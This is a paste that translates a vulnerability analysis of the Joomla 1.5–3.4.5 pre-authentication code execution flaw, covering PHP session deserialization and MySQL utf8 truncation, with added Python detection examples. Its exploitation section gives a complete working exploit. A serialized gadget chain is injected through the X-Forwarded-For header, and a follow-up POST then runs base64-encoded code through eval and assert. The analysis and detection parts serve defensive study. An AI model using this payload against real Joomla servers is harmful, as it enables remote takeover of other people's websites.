joomla poc translation

a guest
Dec 15th, 2015
The Joomla security team has released version 3.4.6, which fixes a high-risk 0day vulnerability.

Affected versions

Joomla 1.5 up to and including 3.4.5

The vulnerability requires no login: it gives code execution from the front end (no administrator access is needed).

1. Session deserialization

PHP function session_set_save_handler()
The official manual describes the read callback as follows:

read(string $sessionId)
If the session has data, the read callback must return the session data as an encoded (serialized) string. If the session has no data, the read callback returns an empty string.

After a session is started, either automatically or by a manual call to session_start(), PHP internally calls the read callback to obtain the session data. Before calling read, PHP calls the open callback.
The serialized string returned by the read callback must be in exactly the format that the write callback used when saving the data. PHP automatically unserializes the returned string and populates the $_SESSION superglobal. Although this data looks similar to the output of serialize(), note that the two formats are different.

In short: if the read method is overridden via session_set_save_handler(), whatever it returns is unserialized and used to fill $_SESSION.
An example:
  22.  
    <?php
    class FileSessionHandler
    {
        private $savePath;

        function open($savePath, $sessionName)
        {
            $this->savePath = $savePath;
            if (!is_dir($this->savePath)) {
                mkdir($this->savePath, 0777);
            }
            return true;
        }

        function close()
        {
            return true;
        }

        function read($id)
        {
            // Raw (still serialized) session data as stored on disk
            $data = @file_get_contents("$this->savePath/sess_$id");
            var_dump($data);
            // PHP unserializes whatever this returns into $_SESSION
            return (string) $data;
        }

        function write($id, $data)
        {
            // Writing is left commented out in this demo (as in the original),
            // so the sess_<id> file placed by hand is not overwritten;
            // returning true keeps the handler valid for PHP.
            // return file_put_contents("$this->savePath/sess_$id", $data) === false ? false : true;
            return true;
        }

        function destroy($id)
        {
            $file = "$this->savePath/sess_$id";
            if (file_exists($file)) {
                unlink($file);
            }
            return true;
        }

        function gc($maxlifetime)
        {
            foreach (glob("$this->savePath/sess_*") as $file) {
                if (filemtime($file) + $maxlifetime < time() && file_exists($file)) {
                    unlink($file);
                }
            }
            return true;
        }
    }

    $handler = new FileSessionHandler();
    session_set_save_handler(
        array($handler, 'open'),
        array($handler, 'close'),
        array($handler, 'read'),
        array($handler, 'write'),
        array($handler, 'destroy'),
        array($handler, 'gc')
    );
    session_start();
    var_dump($_SESSION);
Run results

[image 1.png: output of the two var_dump calls]

As can be seen from the two var_dump outputs, the first shows the data before unserialization (the raw string returned by read) and the second shows the data after unserialization (the populated $_SESSION).
  84.  
2. Database truncation

The MySQL documentation says: "The character set named utf8 uses a maximum of three bytes per character and contains only BMP characters." So when MySQL's utf8 charset is in use, a character is at most 3 bytes; a character that needs 4 bytes requires the utf8mb4 encoding. If utf8mb4 is not used, MySQL does not recognise the 4-byte character, and that character together with everything after it in the string is discarded.
For details, see: http://xteam.baidu.com/?p=177
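The truncation just described, worked through as an added example (Python, not code from the original post). It emulates what a 3-byte utf8 column ends up storing versus a utf8mb4 column, and adds the input check a defender would put in front of such a column. The emulation assumes the server runs in non-strict sql_mode, where the unsupported character truncates the stored value rather than rejecting the row; the sample record is constructed.

```python
# Added example (Python, not from the original post): emulate the post's
# description of MySQL's 3-byte "utf8" charset and check values before they
# are stored in such a column. Assumption: non-strict sql_mode, where an
# unsupported character truncates the stored value (strict mode would
# reject the row instead).

def is_supplementary(ch: str) -> bool:
    """True if the code point lies outside the BMP, i.e. needs 4 bytes in UTF-8."""
    return ord(ch) > 0xFFFF


def utf8_byte_length(ch: str) -> int:
    """Number of bytes the character occupies in UTF-8."""
    return len(ch.encode("utf-8"))


def mysql_utf8_store(value: str) -> str:
    """Value a 3-byte utf8 column ends up holding (non-strict mode emulation):
    everything from the first supplementary character onwards is dropped."""
    for i, ch in enumerate(value):
        if is_supplementary(ch):
            return value[:i]
    return value


def mysql_utf8mb4_store(value: str) -> str:
    """A utf8mb4 column stores the full value unchanged."""
    return value


def safe_for_utf8_column(value: str) -> bool:
    """Input check: reject values that a 3-byte utf8 column would silently cut."""
    return not any(is_supplementary(ch) for ch in value)


# Constructed sample: a PHP-serialized array whose string element contains a
# supplementary character (U+1F600, 4 bytes, hence the byte length s:8).
SAMPLE = 'a:1:{s:3:"key";s:8:"ab\U0001F600cd";}'


def demo() -> dict:
    """Shows how the same record fares in utf8 versus utf8mb4."""
    return {
        "utf8": mysql_utf8_store(SAMPLE),
        "utf8mb4": mysql_utf8mb4_store(SAMPLE),
        "safe": safe_for_utf8_column(SAMPLE),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v!r}")
```

With the utf8 column the stored record ends in the middle of the string element: the closing quote and braces are gone, so the structure of the serialized data is no longer what the application wrote. That is why the remedy is either a utf8mb4 column or rejecting such input before the write, not relying on the stored value matching the written one.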
  89.  
3. Vulnerability analysis

Joomla writes the User-Agent and X-Forwarded-For header contents into the session. Both are controlled from outside, and no filtering is applied.

(fragment of Joomla's session validation code)

        // Record proxy forwarded for in the session in case we need it later
        if (isset($_SERVER['HTTP_X_FORWARDED_FOR']))
        {
            $this->set('session.client.forwarded', $_SERVER['HTTP_X_FORWARDED_FOR']);
        }

        // Check for clients browser
        if (in_array('fix_browser', $this->_security) && isset($_SERVER['HTTP_USER_AGENT']))
        {
            $browser = $this->get('session.client.browser');

            if ($browser === null)
            {
                $this->set('session.client.browser', $_SERVER['HTTP_USER_AGENT']);
            }
            elseif ($_SERVER['HTTP_USER_AGENT'] !== $browser)
            {
                // @todo remove code: $this->_state = 'error';
                // @todo remove code: return false;
            }
        }

        return true;
    }

When the session is then written to the database, the four-byte-character truncation described above applies, so the session data we wrote can later be unserialized successfully.
  116.  
The following is the stored content after the write:

__default | a: 9: {s: 15: "session.counter"; i: 1; s: 19: "session.timer.start"; i: 1450172177; s: 18: "session.timer.last"; i : 1450172177; s: 17: "session.timer.now"; i: 1450172177; s: 24: "session.client.forwarded"; s: 435: "} __ test | O: 21:" JDatabaseDriverMysqli ": 3: { s: 2: "fc"; O: 17: "JSimplepieFactory": 0: {} s: 21: "disconnectHandlers"; a: 1: {i: 0; a: 2: {i: 0; O: 9: "SimplePie": 5: {s: 8: "sanitize"; O: 20: "JDatabaseDriverMysql": 0: {} s: 8: "feed_url"; s: 60: "eval (base64_decode ($ _ POST [111]) ); JFactory :: getConfig (); exit; "; s: 19:" cache_name_function "; s: 6:" assert "; s: 5:" cache "; b: 1; s: 11:" cache_class "; O : 20: "JDatabaseDriverMysql": 0: {}} i: 1; s: 4: "init";}} s: 13: "connection"; b: 1;}
On the next request the session is unserialized automatically:

    public function register()
    {
        // Use this object as the session handler
        session_set_save_handler(
            array($this, 'open'), array($this, 'close'), array($this, 'read'), array($this, 'write'),
            array($this, 'destroy'), array($this, 'gc')
        );
    }

The session_set_save_handler() call overrides the read() method.
The read() method is as follows:

    public function read($id)
    {
        // Get the database connection object and verify its connected.
        $db = JFactory::getDbo();

        try
        {
            // Get the session data from the database table.
            $query = $db->getQuery(true)
                ->select($db->quoteName('data'))
                ->from($db->quoteName('#__session'))
                ->where($db->quoteName('session_id') . ' = ' . $db->quote($id));

            $db->setQuery($query);

            $result = (string) $db->loadResult();

            $result = str_replace('\0\0\0', chr(0) . '*' . chr(0), $result);

            return $result;
        }
        catch (Exception $e)
        {
            return false;
        }
    }

The value returned by read() is automatically unserialized, which results in PHP object injection.
  155.  
4. Exploitation

The User-Agent and X-Forwarded-For headers can be used to modify the session:

GET /joomla/ HTTP/1.1
Host: 192.168.152.130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
x-forwarded-for:} __ test | O: 21: "JDatabaseDriverMysqli": 3: {s: 2: "fc"; O: 17: "JSimplepieFactory": 0: {} s: 21: "disconnectHandlers"; a: 1: {i: 0; a: 2: {i: 0; O: 9: "SimplePie": 5: {s: 8: "sanitize"; O: 20: "JDatabaseDriverMysql": 0: {} s: 8 : "feed_url"; s: 60: "eval (base64_decode ($ _ POST [111])); JFactory :: getConfig (); exit;"; s: 19: "cache_name_function"; s: 6: "assert"; s : 5: "cache"; b: 1; s: 11: "cache_class"; O: 20: "JDatabaseDriverMysql": 0: {}} i: 1; s: 4: "init";}} s: 13: "connection"; b: 1;} ð Œ †
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: 82864b7eae85ebcf7a6fbdda5d464249=h5kl99v8ddi9t64919sf706q64
Connection: keep-alive

Execute the code:

POST /joomla/ HTTP/1.1
Host: 192.168.152.130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: 82864b7eae85ebcf7a6fbdda5d464249=h5kl99v8ddi9t64919sf706q64
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 24

111=cGhwaW5mbygpOw%3d%3d

Just make sure the cookie data is kept consistent between the two requests.
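Detection for the pattern described in sections 3 and 4, as an added example (Python, not code from the original post or from Joomla): the headers Joomla copied into the session (User-Agent, X-Forwarded-For) are inspected for PHP serialization markers and for 4-byte UTF-8 characters, both over a dict of request headers and over web server log lines. The log lines are constructed, the combined log format with a User-Agent field is assumed, and the serialized sample is a generic stdClass rather than anything from the post.

```python
# Added example (Python, not from the original post): detection logic for
# PHP-serialized data or supplementary (4-byte UTF-8) characters arriving in
# request headers that Joomla stored in the session. Log lines are
# constructed; Apache combined log format with a User-Agent field is assumed.

import re

# PHP serialized object / array openers, e.g. O:8:"stdClass":0:{ or a:1:{
PHP_OBJECT = re.compile(r'O:\d+:"[^"]*":\d+:\{')
PHP_ARRAY = re.compile(r'a:\d+:\{')

# Apache combined log format; quoted fields may contain \" escapes
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>(?:[^"\\]|\\.)*)" '
    r'"(?P<ua>(?:[^"\\]|\\.)*)"$'
)

WATCHED_HEADERS = ("User-Agent", "X-Forwarded-For")


def inspect_header_value(value: str) -> list:
    """Findings for one header value; an empty list means nothing suspicious."""
    findings = []
    if PHP_OBJECT.search(value):
        findings.append("php_serialized_object")
    elif PHP_ARRAY.search(value):
        findings.append("php_serialized_array")
    if any(ord(ch) > 0xFFFF for ch in value):
        # A 3-byte utf8 column would cut the stored value at this character
        findings.append("supplementary_utf8")
    return findings


def inspect_request_headers(headers: dict) -> dict:
    """Per-header findings for the headers Joomla copied into the session."""
    out = {}
    for name in WATCHED_HEADERS:
        value = headers.get(name)
        if value is not None:
            found = inspect_header_value(value)
            if found:
                out[name] = found
    return out


def parse_combined(line: str):
    """Splits one combined-format log line into fields, or returns None."""
    m = COMBINED.match(line)
    if not m:
        return None
    fields = m.groupdict()
    # Apache escapes quotes inside logged strings as \"
    fields["ua"] = fields["ua"].replace('\\"', '"')
    return fields


def scan_log(lines) -> list:
    """Returns (ip, findings) for every line whose User-Agent is suspicious."""
    alerts = []
    for line in lines:
        rec = parse_combined(line)
        if rec is None:
            continue
        findings = inspect_header_value(rec["ua"])
        if findings:
            alerts.append((rec["ip"], findings))
    return alerts


# Constructed sample log lines: a normal browser, a serialized object followed
# by U+1F600 in the User-Agent, and a User-Agent with only the 4-byte character.
LOG_LINES = [
    '203.0.113.5 - - [15/Dec/2015:10:00:01 +0000] "GET /joomla/ HTTP/1.1" 200 5120 "-" '
    '"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0"',
    '203.0.113.9 - - [15/Dec/2015:10:00:07 +0000] "GET /joomla/ HTTP/1.1" 200 5120 "-" '
    '"}__test|O:8:\\"stdClass\\":0:{}' + '\U0001F600"',
    '203.0.113.12 - - [15/Dec/2015:10:00:09 +0000] "GET /joomla/ HTTP/1.1" 200 5120 "-" '
    '"Mozilla/5.0 \U0001F600"',
]

if __name__ == "__main__":
    for ip, findings in scan_log(LOG_LINES):
        print(ip, findings)
```

X-Forwarded-For is usually not in the default log format, so the header-dict check is the one to run at the reverse proxy or in the application, while the log scan covers the User-Agent side retrospectively. A serialized object marker in either header has no legitimate reason to be there; the 4-byte character alone is a weaker signal (emoji in a User-Agent does occur), so it is reported separately.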
  183.  
[image 2.jpg: result of the request]

Related links

[1] https://docs.joomla.org/Security_hotfixes_for_Joomla_EOL_versions
[2] http://php.net/session_set_save_handler